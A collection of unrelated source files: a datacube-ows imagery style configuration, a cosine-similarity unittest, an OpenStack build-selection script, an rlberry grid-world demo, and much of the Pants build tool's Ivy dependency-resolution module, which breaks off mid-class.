"blue": {
"function": "datacube_ows.band_utils.single_band_offset_log",
"mapped_bands": True,
"kwargs": {
"band": "bcdev",
"scale_from": bcdev_scaling,
},
},
},
"additional_bands": ["sdev", "bcdev", "edev"],
"legend": {
"show_legend": True,
"url": "https://data.dea.ga.gov.au/tmad-annual/geomad.png",
},
}
style_tmad_rgb_sens = {
"inherits": style_tmad_rgb_std,
"name": "tmad_rgb_sens",
"title": "MADs (desert) - SMAD, EMAD, BCMAD",
"abstract": "Good for arid land and desert",
"components": {
"red": {
"kwargs": {
"scale_from": [0.0005, 0.11],
}
},
"green": {
"kwargs": {
"scale_from": [5.9, 6.9],
}
},
"blue": {
"kwargs": {
"scale_from": [0.008, 0.07],
}
},
},
"legend": {
"show_legend": True,
"url": "https://data.dea.ga.gov.au/tmad-annual/geomad.png",
},
}
style_gm_count = {
"name": "count",
"title": "Clear observation count",
"abstract": "Count of observations included in geomedian/MAD calculations",
"index_function": {
"function": "datacube_ows.band_utils.single_band",
"mapped_bands": True,
"kwargs": {
"band": "count",
},
},
"needed_bands": ["count"],
"include_in_feature_info": False,
"color_ramp": [
{"value": 0, "color": "#666666", "alpha": 0},
{
# purely for legend display
# we should not get fractional
# values in this styles
"value": 0.2,
"color": "#890000",
"alpha": 1,
},
{"value": 5, "color": "#990000"},
{"value": 10, "color": "#E38400"},
{"value": 15, "color": "#E3DF00"},
{"value": 20, "color": "#A6E300"},
{"value": 25, "color": "#00E32D"},
{"value": 30, "color": "#00E3C8"},
{"value": 35, "color": "#0097E3"},
{"value": 40, "color": "#005FE3"},
{"value": 45, "color": "#000FE3"},
{"value": 50, "color": "#000EA9"},
{"value": 55, "color": "#5700E3"},
],
"legend": {
"begin": "0",
"end": "50",
"decimal_places": 0,
"ticks_every": 10,
"tick_labels": {
"50": {"prefix": ">"},
},
},
}
styles_c3_ls_list = [
style_ls_simple_rgb,
style_ls_irg,
style_ls_ndvi,
style_ls_ndwi,
style_ls_mndwi,
style_ls_pure_blue,
style_ls_pure_green,
style_ls_pure_red,
style_ls_pure_nir,
style_ls_pure_swir1,
style_ls_pure_swir2,
style_tmad_sdev_std,
style_tmad_edev_std,
style_tmad_bcdev_std,
style_tmad_rgb_std,
style_tmad_rgb_sens,
style_gm_count,
]
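# Illustrative sketch (not part of the original file): how a style list such as
# styles_c3_ls_list is typically referenced from a datacube-ows layer's styling
# block. The surrounding keys are assumptions based on the datacube-ows
# configuration format, not taken from this repository.
example_layer_styling = {
    "styling": {
        "default_style": "simple_rgb",
        "styles": styles_c3_ls_list,
    },
}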
|
the-stack_106_16825
|
# Copyright (c) 2018 luozhouyang
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import unittest
from .cosine import Cosine
class TestCosine(unittest.TestCase):
def test_cosine(self):
cos = Cosine(1)
s = ['', ' ', 'Shanghai', 'ShangHai', 'Shang Hai']
for i in range(len(s)):
for j in range(i, len(s)):
print('dis between \'%s\' and \'%s\': %.4f' % (s[i], s[j], cos.distance(s[i], s[j])))
print('sim between \'%s\' and \'%s\': %.4f' % (s[i], s[j], cos.similarity(s[i], s[j])))
if __name__ == "__main__":
unittest.main()
|
the-stack_106_16828
|
import os
import sys
import yaml
VERSION = os.environ.get("VERSION", "latest")
OPENSTACK_VERSION = os.environ.get("OPENSTACK_VERSION", "latest")
BUILD_TYPE = os.environ.get("BUILD_TYPE", "all")
OPENSTACK_CORE_PROJECTS = [
"cinder",
"designate",
"glance",
"heat",
"horizon",
"keystone",
"neutron",
"nova",
"octavia",
"placement",
]
filename = "release/%s/openstack-%s.yml" % (VERSION, OPENSTACK_VERSION)
with open(filename, "rb") as fp:
versions = yaml.load(fp, Loader=yaml.FullLoader)
projects = []
# http://stackoverflow.com/questions/38987/how-to-merge-two-python-dictionaries-in-a-single-expression
if BUILD_TYPE in ["all", "base"]:
all_projects = versions["openstack_projects"].copy()
all_projects.update(versions["infrastructure_projects"])
elif BUILD_TYPE == "openstack-core":
all_projects = [x for x in versions["openstack_projects"] if x in OPENSTACK_CORE_PROJECTS] # noqa: E501
elif BUILD_TYPE == "openstack-additional":
all_projects = [x for x in versions["openstack_projects"] if x not in OPENSTACK_CORE_PROJECTS] # noqa: E501
elif BUILD_TYPE == "infrastructure":
all_projects = versions["infrastructure_projects"]
del(all_projects["openstack-base"])
else:
print("BUILD_TYPE %s not supported" % BUILD_TYPE)
sys.exit(1)
for project in all_projects:
if "vpnaas" not in project and "lbaas" not in project:
projects.append(project)
print("^" + " ^".join(sorted(projects)))
|
the-stack_106_16830
|
from rlberry.envs.benchmarks.grid_exploration.nroom import NRoom
from rlberry.agents.dynprog import ValueIterationAgent
env = NRoom(nrooms=9,
remove_walls=False,
room_size=9,
initial_state_distribution='center',
include_traps=True)
horizon = env.observation_space.n
agent = ValueIterationAgent(env, gamma=0.999, horizon=horizon)
print("fitting...")
info = agent.fit()
print(info)
env.enable_rendering()
for _ in range(10):
state = env.reset()
for tt in range(horizon):
# action = agent.policy(state)
action = env.action_space.sample()
next_s, _, done, _ = env.step(action)
if done:
break
state = next_s
env.render()
|
the-stack_106_16835
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import json
import logging
import os
import pkgutil
import threading
import xml.etree.ElementTree as ET
from abc import abstractmethod
from builtins import object, open, str
from collections import OrderedDict, defaultdict, namedtuple
from functools import total_ordering
import six
from future.utils import PY3
from twitter.common.collections import OrderedSet
from pants.backend.jvm.subsystems.jar_dependency_management import (JarDependencyManagement,
PinnedJarArtifactSet)
from pants.backend.jvm.targets.exportable_jvm_library import ExportableJvmLibrary
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.base.generator import Generator, TemplateData
from pants.base.revision import Revision
from pants.build_graph.target import Target
from pants.ivy.bootstrapper import Bootstrapper
from pants.java.jar.exclude import Exclude
from pants.java.jar.jar_dependency import JarDependency
from pants.java.jar.jar_dependency_utils import M2Coordinate, ResolvedJar
from pants.java.util import execute_runner
from pants.util.dirutil import safe_concurrent_creation, safe_mkdir, safe_open
from pants.util.fileutil import atomic_copy, safe_hardlink_or_copy
class IvyResolutionStep(object):
"""Ivy specific class for describing steps of performing resolution."""
# NB(nh): This class is the base class for the ivy resolve and fetch steps.
# It also specifies the abstract methods that define the components of resolution steps.
def __init__(self, confs, hash_name, pinned_artifacts, soft_excludes, ivy_resolution_cache_dir,
ivy_repository_cache_dir, global_ivy_workdir):
"""
:param confs: A tuple of string ivy confs to resolve for.
:param hash_name: A unique string name for this resolve.
:param pinned_artifacts: A tuple of "artifact-alikes" to force the versions of.
:param soft_excludes: A flag marking whether to pass excludes to Ivy or to apply them after the
fact.
:param ivy_repository_cache_dir: The cache directory used by Ivy for repository cache data.
:param ivy_resolution_cache_dir: The cache directory used by Ivy for resolution cache data.
:param global_ivy_workdir: The workdir that all ivy outputs live in.
"""
self.confs = confs
self.hash_name = hash_name
self.pinned_artifacts = pinned_artifacts
self.soft_excludes = soft_excludes
self.ivy_repository_cache_dir = ivy_repository_cache_dir
self.ivy_resolution_cache_dir = ivy_resolution_cache_dir
self.global_ivy_workdir = global_ivy_workdir
self.workdir_reports_by_conf = {c: self.resolve_report_path(c) for c in confs}
@abstractmethod
def required_load_files_exist(self):
"""The files required to load a previous resolve exist."""
@abstractmethod
def required_exec_files_exist(self):
"""The files to do a resolve exist."""
@abstractmethod
def load(self, targets):
"""Loads the result of a resolve or fetch."""
@abstractmethod
def exec_and_load(self, executor, extra_args, targets, jvm_options, workunit_name,
workunit_factory):
"""Runs the resolve or fetch and loads the result, returning it."""
@property
def workdir(self):
return os.path.join(self.global_ivy_workdir, self.hash_name)
@property
def hardlink_classpath_filename(self):
return os.path.join(self.workdir, 'classpath')
@property
def ivy_cache_classpath_filename(self):
return '{}.raw'.format(self.hardlink_classpath_filename)
@property
def frozen_resolve_file(self):
return os.path.join(self.workdir, 'resolution.json')
@property
def hardlink_dir(self):
return os.path.join(self.global_ivy_workdir, 'jars')
@abstractmethod
def ivy_xml_path(self):
"""Ivy xml location."""
@abstractmethod
def resolve_report_path(self, conf):
"""Location of the resolve report in the workdir."""
def _construct_and_load_hardlink_map(self):
artifact_paths, hardlink_map = IvyUtils.construct_and_load_hardlink_map(
self.hardlink_dir,
self.ivy_repository_cache_dir,
self.ivy_cache_classpath_filename,
self.hardlink_classpath_filename)
return artifact_paths, hardlink_map
def _call_ivy(self, executor, extra_args, ivyxml, jvm_options, hash_name_for_report,
workunit_factory, workunit_name):
IvyUtils.do_resolve(executor,
extra_args,
ivyxml,
jvm_options,
self.workdir_reports_by_conf,
self.confs,
self.ivy_resolution_cache_dir,
self.ivy_cache_classpath_filename,
hash_name_for_report,
workunit_factory,
workunit_name)
class IvyFetchStep(IvyResolutionStep):
"""Resolves ivy artifacts using the coordinates from a previous resolve."""
def required_load_files_exist(self):
return (all(os.path.isfile(report) for report in self.workdir_reports_by_conf.values()) and
os.path.isfile(self.ivy_cache_classpath_filename) and
os.path.isfile(self.frozen_resolve_file))
def resolve_report_path(self, conf):
return os.path.join(self.workdir, 'fetch-report-{}.xml'.format(conf))
@property
def ivy_xml_path(self):
return os.path.join(self.workdir, 'fetch-ivy.xml')
def required_exec_files_exist(self):
return os.path.isfile(self.frozen_resolve_file)
def load(self, targets):
try:
frozen_resolutions = FrozenResolution.load_from_file(self.frozen_resolve_file,
targets)
except Exception as e:
logger.debug('Failed to load {}: {}'.format(self.frozen_resolve_file, e))
return NO_RESOLVE_RUN_RESULT
return self._load_from_fetch(frozen_resolutions)
def exec_and_load(self, executor, extra_args, targets, jvm_options, workunit_name,
workunit_factory):
try:
frozen_resolutions = FrozenResolution.load_from_file(self.frozen_resolve_file,
targets)
except Exception as e:
logger.debug('Failed to load {}: {}'.format(self.frozen_resolve_file, e))
return NO_RESOLVE_RUN_RESULT
self._do_fetch(executor, extra_args, frozen_resolutions, jvm_options,
workunit_name, workunit_factory)
result = self._load_from_fetch(frozen_resolutions)
if not result.all_linked_artifacts_exist():
raise IvyResolveMappingError(
'Some artifacts were not linked to {} for {}'.format(self.global_ivy_workdir,
result))
return result
def _load_from_fetch(self, frozen_resolutions):
artifact_paths, hardlink_map = self._construct_and_load_hardlink_map()
return IvyFetchResolveResult(artifact_paths,
hardlink_map,
self.hash_name,
self.workdir_reports_by_conf,
frozen_resolutions)
def _do_fetch(self, executor, extra_args, frozen_resolution, jvm_options, workunit_name,
workunit_factory):
# It's important for fetches to have a different ivy report from resolves as their
# contents differ.
hash_name_for_report = '{}-fetch'.format(self.hash_name)
ivyxml = self.ivy_xml_path
self._prepare_ivy_xml(frozen_resolution, ivyxml, hash_name_for_report)
self._call_ivy(executor, extra_args, ivyxml, jvm_options, hash_name_for_report,
workunit_factory, workunit_name)
def _prepare_ivy_xml(self, frozen_resolution, ivyxml, resolve_hash_name_for_report):
# NB(nh): Our ivy.xml ensures that we always get the default configuration, even if it's not
# part of the requested confs.
default_resolution = frozen_resolution.get('default')
if default_resolution is None:
raise IvyUtils.IvyError("Couldn't find the frozen resolution for the 'default' ivy conf.")
try:
jars = default_resolution.jar_dependencies
IvyUtils.generate_fetch_ivy(jars, ivyxml, self.confs, resolve_hash_name_for_report)
except Exception as e:
raise IvyUtils.IvyError('Failed to prepare ivy resolve: {}'.format(e))
class IvyResolveStep(IvyResolutionStep):
"""Resolves ivy artifacts and produces a cacheable file containing the resulting coordinates."""
def required_load_files_exist(self):
return (all(os.path.isfile(report) for report in self.workdir_reports_by_conf.values()) and
os.path.isfile(self.ivy_cache_classpath_filename))
def resolve_report_path(self, conf):
return os.path.join(self.workdir, 'resolve-report-{}.xml'.format(conf))
@property
def ivy_xml_path(self):
return os.path.join(self.workdir, 'resolve-ivy.xml')
def load(self, targets):
artifact_paths, hardlink_map = self._construct_and_load_hardlink_map()
return IvyResolveResult(artifact_paths,
hardlink_map,
self.hash_name,
self.workdir_reports_by_conf)
def exec_and_load(self, executor, extra_args, targets, jvm_options,
workunit_name, workunit_factory):
self._do_resolve(executor, extra_args, targets, jvm_options, workunit_name, workunit_factory)
result = self.load(targets)
if not result.all_linked_artifacts_exist():
raise IvyResolveMappingError(
'Some artifacts were not linked to {} for {}'.format(self.global_ivy_workdir,
result))
frozen_resolutions_by_conf = result.get_frozen_resolutions_by_conf(targets)
FrozenResolution.dump_to_file(self.frozen_resolve_file, frozen_resolutions_by_conf)
return result
def _do_resolve(self, executor, extra_args, targets, jvm_options, workunit_name, workunit_factory):
ivyxml = self.ivy_xml_path
hash_name = '{}-resolve'.format(self.hash_name)
self._prepare_ivy_xml(targets, ivyxml, hash_name)
self._call_ivy(executor, extra_args, ivyxml, jvm_options, hash_name,
workunit_factory, workunit_name)
def _prepare_ivy_xml(self, targets, ivyxml, hash_name):
# TODO(John Sirois): merge the code below into IvyUtils or up here; either way, better
# diagnostics can be had in `IvyUtils.generate_ivy` if this is done.
# See: https://github.com/pantsbuild/pants/issues/2239
jars, global_excludes = IvyUtils.calculate_classpath(targets)
# Don't pass global excludes to ivy when using soft excludes.
if self.soft_excludes:
global_excludes = []
IvyUtils.generate_ivy(targets, jars, global_excludes, ivyxml, self.confs,
hash_name, self.pinned_artifacts)
class FrozenResolution(object):
"""Contains the abstracted results of a resolve.
With this we can do a simple fetch.
"""
# TODO(nh): include full dependency graph in here.
# So that we can inject it into the build graph if we want to.
class MissingTarget(Exception):
"""Thrown when a loaded resolution has a target spec for a target that doesn't exist."""
def __init__(self):
self.target_to_resolved_coordinates = defaultdict(OrderedSet)
self.all_resolved_coordinates = OrderedSet()
self.coordinate_to_attributes = OrderedDict()
@property
def jar_dependencies(self):
return [
JarDependency(c.org, c.name, c.rev, classifier=c.classifier, ext=c.ext,
**self.coordinate_to_attributes.get(c, {}))
for c in self.all_resolved_coordinates]
def add_resolved_jars(self, target, resolved_jars):
coords = [j.coordinate for j in resolved_jars]
self.add_resolution_coords(target, coords)
# Assuming target is a jar library.
for j in target.jar_dependencies:
url = j.get_url(relative=True)
if url:
self.coordinate_to_attributes[j.coordinate] = {'url': url, 'base_path': j.base_path}
else:
self.coordinate_to_attributes[j.coordinate] = {}
def add_resolution_coords(self, target, coords):
for c in coords:
self.target_to_resolved_coordinates[target].add(c)
self.all_resolved_coordinates.add(c)
def target_spec_to_coordinate_strings(self):
return {t.address.spec: [str(c) for c in coordinates]
for t, coordinates in self.target_to_resolved_coordinates.items()}
def __repr__(self):
return 'FrozenResolution(\n target_to_resolved_coordinates\n {}\n all\n {}'.format(
'\n '.join(': '.join([t.address.spec,
'\n '.join(str(c) for c in cs)])
for t,cs in self.target_to_resolved_coordinates.items()),
'\n '.join(str(c) for c in self.coordinate_to_attributes.keys())
)
def __eq__(self, other):
return (type(self) == type(other) and
self.all_resolved_coordinates == other.all_resolved_coordinates and
self.target_to_resolved_coordinates == other.target_to_resolved_coordinates)
def __ne__(self, other):
return not self == other
@classmethod
def load_from_file(cls, filename, targets):
if not os.path.exists(filename):
return None
with open(filename, 'r') as f:
# Using OrderedDict here to maintain insertion order of dict entries.
from_file = json.load(f, object_pairs_hook=OrderedDict)
result = {}
target_lookup = {t.address.spec: t for t in targets}
for conf, serialized_resolution in from_file.items():
resolution = FrozenResolution()
def m2_for(c):
return M2Coordinate.from_string(c)
for coord, attr_dict in serialized_resolution['coord_to_attrs'].items():
m2 = m2_for(coord)
resolution.coordinate_to_attributes[m2] = attr_dict
for spec, coord_strs in serialized_resolution['target_to_coords'].items():
t = target_lookup.get(spec, None)
if t is None:
raise cls.MissingTarget('Cannot find target for address {} in frozen resolution'
.format(spec))
resolution.add_resolution_coords(t, [m2_for(c) for c in coord_strs])
result[conf] = resolution
return result
@classmethod
def dump_to_file(cls, filename, resolutions_by_conf):
res = {}
for conf, resolution in resolutions_by_conf.items():
res[conf] = OrderedDict([
['target_to_coords',resolution.target_spec_to_coordinate_strings()],
['coord_to_attrs', OrderedDict([str(c), attrs]
for c, attrs in resolution.coordinate_to_attributes.items())]
])
with safe_concurrent_creation(filename) as tmp_filename:
mode = 'w' if PY3 else 'wb'
with open(tmp_filename, mode) as f:
json.dump(res, f)
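# Round-trip note (not part of the original module): dump_to_file serialises
# {conf: {"target_to_coords": {...}, "coord_to_attrs": {...}}} as JSON, and
# load_from_file rebuilds FrozenResolution objects keyed by conf, mapping target
# specs back to Target objects via its `targets` argument.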
class IvyResolveResult(object):
"""The result of an Ivy resolution.
The result data includes the list of resolved artifacts, the relationships between those artifacts
and the targets that requested them and the hash name of the resolve.
"""
def __init__(self, resolved_artifact_paths, hardlink_map, resolve_hash_name, reports_by_conf):
self._reports_by_conf = reports_by_conf
self.resolved_artifact_paths = resolved_artifact_paths
self.resolve_hash_name = resolve_hash_name
self._hardlink_map = hardlink_map
@property
def has_resolved_artifacts(self):
"""The requested targets have a resolution associated with them."""
return self.resolve_hash_name is not None
def all_linked_artifacts_exist(self):
"""All of the artifact paths for this resolve point to existing files."""
if not self.has_resolved_artifacts:
return False
for path in self.resolved_artifact_paths:
if not os.path.isfile(path):
return False
else:
return True
def report_for_conf(self, conf):
"""Returns the path to the ivy report for the provided conf.
Returns None if there is no path.
"""
return self._reports_by_conf.get(conf)
def get_frozen_resolutions_by_conf(self, targets):
frozen_resolutions_by_conf = OrderedDict()
for conf in self._reports_by_conf:
frozen_resolution = FrozenResolution()
for target, resolved_jars in self.resolved_jars_for_each_target(conf, targets):
frozen_resolution.add_resolved_jars(target, resolved_jars)
frozen_resolutions_by_conf[conf] = frozen_resolution
return frozen_resolutions_by_conf
def resolved_jars_for_each_target(self, conf, targets):
"""Yields the resolved jars for each passed JarLibrary.
If there is no report for the requested conf, yields nothing.
:param conf: The ivy conf to load jars for.
:param targets: The collection of JarLibrary targets to find resolved jars for.
:yield: target, resolved_jars
:raises IvyTaskMixin.UnresolvedJarError
"""
ivy_info = self._ivy_info_for(conf)
if not ivy_info:
return
jar_library_targets = [t for t in targets if isinstance(t, JarLibrary)]
ivy_jar_memo = {}
for target in jar_library_targets:
# Add the artifacts from each dependency module.
resolved_jars = self._resolved_jars_with_hardlinks(conf, ivy_info, ivy_jar_memo,
self._jar_dependencies_for_target(conf,
target),
target)
yield target, resolved_jars
def _jar_dependencies_for_target(self, conf, target):
return target.jar_dependencies
def _ivy_info_for(self, conf):
report_path = self._reports_by_conf.get(conf)
return IvyUtils.parse_xml_report(conf, report_path)
def _new_resolved_jar_with_hardlink_path(self, conf, target, resolved_jar_without_hardlink):
def candidate_cache_paths():
# There is a focus on being lazy here to avoid `os.path.realpath` when we can.
yield resolved_jar_without_hardlink.cache_path
yield os.path.realpath(resolved_jar_without_hardlink.cache_path)
for cache_path in candidate_cache_paths():
pants_path = self._hardlink_map.get(cache_path)
if pants_path:
break
else:
raise IvyResolveMappingError(
'Jar {resolved_jar} in {spec} not resolved to the ivy '
'hardlink map in conf {conf}.'
.format(spec=target.address.spec,
resolved_jar=resolved_jar_without_hardlink.cache_path,
conf=conf))
return ResolvedJar(coordinate=resolved_jar_without_hardlink.coordinate,
pants_path=pants_path,
cache_path=resolved_jar_without_hardlink.cache_path)
def _resolved_jars_with_hardlinks(self, conf, ivy_info, ivy_jar_memo, coordinates, target):
raw_resolved_jars = ivy_info.get_resolved_jars_for_coordinates(coordinates,
memo=ivy_jar_memo)
resolved_jars = [self._new_resolved_jar_with_hardlink_path(conf, target, raw_resolved_jar)
for raw_resolved_jar in raw_resolved_jars]
return resolved_jars
class IvyFetchResolveResult(IvyResolveResult):
"""A resolve result that uses the frozen resolution to look up dependencies."""
def __init__(self, resolved_artifact_paths, hardlink_map, resolve_hash_name, reports_by_conf,
frozen_resolutions):
super(IvyFetchResolveResult, self).__init__(resolved_artifact_paths, hardlink_map,
resolve_hash_name, reports_by_conf)
self._frozen_resolutions = frozen_resolutions
def _jar_dependencies_for_target(self, conf, target):
return self._frozen_resolutions[conf].target_to_resolved_coordinates.get(target, ())
NO_RESOLVE_RUN_RESULT = IvyResolveResult([], {}, None, {})
IvyModule = namedtuple('IvyModule', ['ref', 'artifact', 'callers'])
Dependency = namedtuple('DependencyAttributes',
['org', 'name', 'rev', 'mutable', 'force', 'transitive'])
Artifact = namedtuple('Artifact', ['name', 'type_', 'ext', 'url', 'classifier'])
logger = logging.getLogger(__name__)
class IvyResolveMappingError(Exception):
"""Raised when there is a failure mapping the ivy resolve results to pants objects."""
@total_ordering
class IvyModuleRef(object):
"""
:API: public
"""
# latest.integration is ivy magic meaning "just get the latest version"
_ANY_REV = 'latest.integration'
def __init__(self, org, name, rev, classifier=None, ext=None):
self.org = org
self.name = name
self.rev = rev
self.classifier = classifier
self.ext = ext or 'jar'
self._id = (self.org, self.name, self.rev, self.classifier, self.ext)
def __eq__(self, other):
return isinstance(other, IvyModuleRef) and self._id == other._id
# TODO(python3port): Return NotImplemented if other does not have attributes
def __lt__(self, other):
    # We can't just re-use __repr__ or __str__ because we want to order rev last
return ((self.org, self.name, self.classifier or '', self.ext, self.rev) <
(other.org, other.name, other.classifier or '', other.ext, other.rev))
def __hash__(self):
return hash(self._id)
def __str__(self):
return 'IvyModuleRef({})'.format(':'.join((x or '') for x in self._id))
def __repr__(self):
return ('IvyModuleRef(org={!r}, name={!r}, rev={!r}, classifier={!r}, ext={!r})'
.format(*self._id))
@property
def caller_key(self):
"""This returns an identifier for an IvyModuleRef that only retains the caller org and name.
Ivy represents dependees as `<caller/>`'s with just org and name and rev information.
This method returns a `<caller/>` representation of the current ref.
"""
return IvyModuleRef(name=self.name, org=self.org, rev=self._ANY_REV)
@property
def unversioned(self):
"""This returns an identifier for an IvyModuleRef without version information.
It's useful because ivy might return information about a different version of a dependency than
the one we request, and we want to ensure that all requesters of any version of that dependency
are able to learn about it.
"""
return IvyModuleRef(name=self.name, org=self.org, rev=self._ANY_REV, classifier=self.classifier,
ext=self.ext)
class IvyInfo(object):
"""
:API: public
"""
def __init__(self, conf):
self._conf = conf
self.modules_by_ref = {} # Map from ref to referenced module.
self.refs_by_unversioned_refs = {} # Map from unversioned ref to the resolved versioned ref
# Map from ref of caller to refs of modules required by that caller.
self._deps_by_caller = defaultdict(OrderedSet)
# Map from _unversioned_ ref to OrderedSet of IvyArtifact instances.
self._artifacts_by_ref = defaultdict(OrderedSet)
def add_module(self, module):
if not module.artifact:
# Module was evicted, so do not record information about it
return
ref_unversioned = module.ref.unversioned
if ref_unversioned in self.refs_by_unversioned_refs:
raise IvyResolveMappingError('Already defined module {}, as rev {}!'
.format(ref_unversioned, module.ref.rev))
if module.ref in self.modules_by_ref:
raise IvyResolveMappingError('Already defined module {}, would be overwritten!'
.format(module.ref))
self.refs_by_unversioned_refs[ref_unversioned] = module.ref
self.modules_by_ref[module.ref] = module
for caller in module.callers:
self._deps_by_caller[caller.caller_key].add(module.ref)
self._artifacts_by_ref[ref_unversioned].add(module.artifact)
def _do_traverse_dependency_graph(self, ref, collector, memo, visited):
memoized_value = memo.get(ref)
if memoized_value:
return memoized_value
if ref in visited:
# Ivy allows for circular dependencies
# If we're here, that means we're resolving something that
# transitively depends on itself
return set()
visited.add(ref)
acc = collector(ref)
# NB(zundel): ivy does not return deps in a consistent order for the same module for
# different resolves. Sort them to get consistency and prevent cache invalidation.
# See https://github.com/pantsbuild/pants/issues/2607
deps = sorted(self._deps_by_caller.get(ref.caller_key, ()))
for dep in deps:
acc.update(self._do_traverse_dependency_graph(dep, collector, memo, visited))
memo[ref] = acc
return acc
def traverse_dependency_graph(self, ref, collector, memo=None):
"""Traverses module graph, starting with ref, collecting values for each ref into the sets
created by the collector function.
    :param ref: an IvyModuleRef to start traversing the ivy dependency graph
    :param collector: a function that takes a ref and returns a new set of values to collect for
      that ref, which will also be updated with all the dependencies' accumulated values
    :param memo: a dict of ref -> set that memoizes the results of each node in the graph.
      If provided, allows the cache to be retained across calls.
    :returns: the accumulated set for ref
"""
resolved_ref = self.refs_by_unversioned_refs.get(ref.unversioned)
if resolved_ref:
ref = resolved_ref
if memo is None:
memo = dict()
visited = set()
return self._do_traverse_dependency_graph(ref, collector, memo, visited)
def get_resolved_jars_for_coordinates(self, coordinates, memo=None):
"""Collects jars for the passed coordinates.
Because artifacts are only fetched for the "winning" version of a module, the artifacts
will not always represent the version originally declared by the library.
This method is transitive within the passed coordinates dependencies.
    :param collections.Iterable coordinates: Collection of coordinates to collect transitive
resolved jars for.
:param memo: See `traverse_dependency_graph`.
:returns: All the artifacts for all of the jars for the provided coordinates,
including transitive dependencies.
:rtype: list of :class:`pants.java.jar.ResolvedJar`
"""
def to_resolved_jar(jar_ref, jar_path):
return ResolvedJar(coordinate=M2Coordinate(org=jar_ref.org,
name=jar_ref.name,
rev=jar_ref.rev,
classifier=jar_ref.classifier,
ext=jar_ref.ext),
cache_path=jar_path)
resolved_jars = OrderedSet()
def create_collection(dep):
return OrderedSet([dep])
for jar in coordinates:
classifier = jar.classifier if self._conf == 'default' else self._conf
jar_module_ref = IvyModuleRef(jar.org, jar.name, jar.rev, classifier, jar.ext)
for module_ref in self.traverse_dependency_graph(jar_module_ref, create_collection, memo):
for artifact_path in self._artifacts_by_ref[module_ref.unversioned]:
resolved_jars.add(to_resolved_jar(module_ref, artifact_path))
return resolved_jars
def __repr__(self):
return 'IvyInfo(conf={}, refs={})'.format(self._conf, self.modules_by_ref.keys())
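# Illustrative sketch (not part of the original module): populating an IvyInfo by hand and
# traversing its dependency graph with a custom collector. The refs and artifact paths are
# invented; real data comes from parsed ivy xml reports.
def _demo_ivy_info_traversal():
  info = IvyInfo('default')
  root = IvyModuleRef('org.example', 'app', '1.0')
  dep = IvyModuleRef('org.example', 'lib', '2.0')
  info.add_module(IvyModule(root, '/cache/app-1.0.jar', ()))
  info.add_module(IvyModule(dep, '/cache/lib-2.0.jar', (root,)))
  # Collect every artifact reachable from the root ref, including transitive dependencies.
  def collect_artifacts(ref):
    return set(info._artifacts_by_ref[ref.unversioned])
  return info.traverse_dependency_graph(root, collect_artifacts)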
class IvyUtils(object):
"""Useful methods related to interaction with ivy.
:API: public
"""
# Protects ivy executions.
_ivy_lock = threading.RLock()
# Protect writes to the global map of jar path -> hardlinks to that jar.
_hardlink_map_lock = threading.Lock()
INTERNAL_ORG_NAME = 'internal'
class IvyError(Exception):
"""Indicates an error preparing an ivy operation."""
class IvyResolveReportError(IvyError):
"""Indicates that an ivy report cannot be found."""
class IvyResolveConflictingDepsError(IvyError):
"""Indicates two or more locally declared dependencies conflict."""
class BadRevisionError(IvyError):
"""Indicates an unparseable version number."""
@staticmethod
def _generate_exclude_template(exclude):
return TemplateData(org=exclude.org, name=exclude.name)
@staticmethod
def _generate_override_template(jar):
return TemplateData(org=jar.org, module=jar.name, version=jar.rev)
@staticmethod
def _load_classpath_from_cachepath(path):
if not os.path.exists(path):
return []
else:
with safe_open(path, 'r') as cp:
return [_f for _f in (path.strip() for path in cp.read().split(os.pathsep)) if _f]
@classmethod
def do_resolve(cls, executor, extra_args, ivyxml, jvm_options, workdir_report_paths_by_conf,
confs, ivy_resolution_cache_dir, ivy_cache_classpath_filename, resolve_hash_name,
workunit_factory, workunit_name):
"""Execute Ivy with the given ivy.xml and copies all relevant files into the workdir.
This method does an Ivy resolve, which may be either a Pants resolve or a Pants fetch depending
on whether there is an existing frozen resolution.
After it is run, the Ivy reports are copied into the workdir at the paths specified by
workdir_report_paths_by_conf along with a file containing a list of all the requested artifacts
and their transitive dependencies.
:param executor: A JVM executor to use to invoke ivy.
:param extra_args: Extra arguments to pass to ivy.
:param ivyxml: The input ivy.xml containing the dependencies to resolve.
:param jvm_options: A list of jvm option strings to use for the ivy invoke, or None.
:param workdir_report_paths_by_conf: A dict mapping confs to report paths in the workdir.
    :param confs: The confs used in the resolve.
    :param ivy_resolution_cache_dir: The ivy resolution cache dir the xml reports are read from.
    :param ivy_cache_classpath_filename: The file the resolved classpath is written to.
:param resolve_hash_name: The hash to use as the module name for finding the ivy report file.
:param workunit_factory: A workunit factory for the ivy invoke, or None.
:param workunit_name: A workunit name for the ivy invoke, or None.
"""
ivy = Bootstrapper.default_ivy(bootstrap_workunit_factory=workunit_factory)
with safe_concurrent_creation(ivy_cache_classpath_filename) as raw_target_classpath_file_tmp:
extra_args = extra_args or []
args = ['-cachepath', raw_target_classpath_file_tmp] + extra_args
with cls._ivy_lock:
cls._exec_ivy(ivy, confs, ivyxml, args,
jvm_options=jvm_options,
executor=executor,
workunit_name=workunit_name,
workunit_factory=workunit_factory)
if not os.path.exists(raw_target_classpath_file_tmp):
raise cls.IvyError('Ivy failed to create classpath file at {}'
.format(raw_target_classpath_file_tmp))
cls._copy_ivy_reports(workdir_report_paths_by_conf, confs, ivy_resolution_cache_dir, resolve_hash_name)
    logger.debug('Moved ivy classpath file to {dest}'
.format(dest=ivy_cache_classpath_filename))
@classmethod
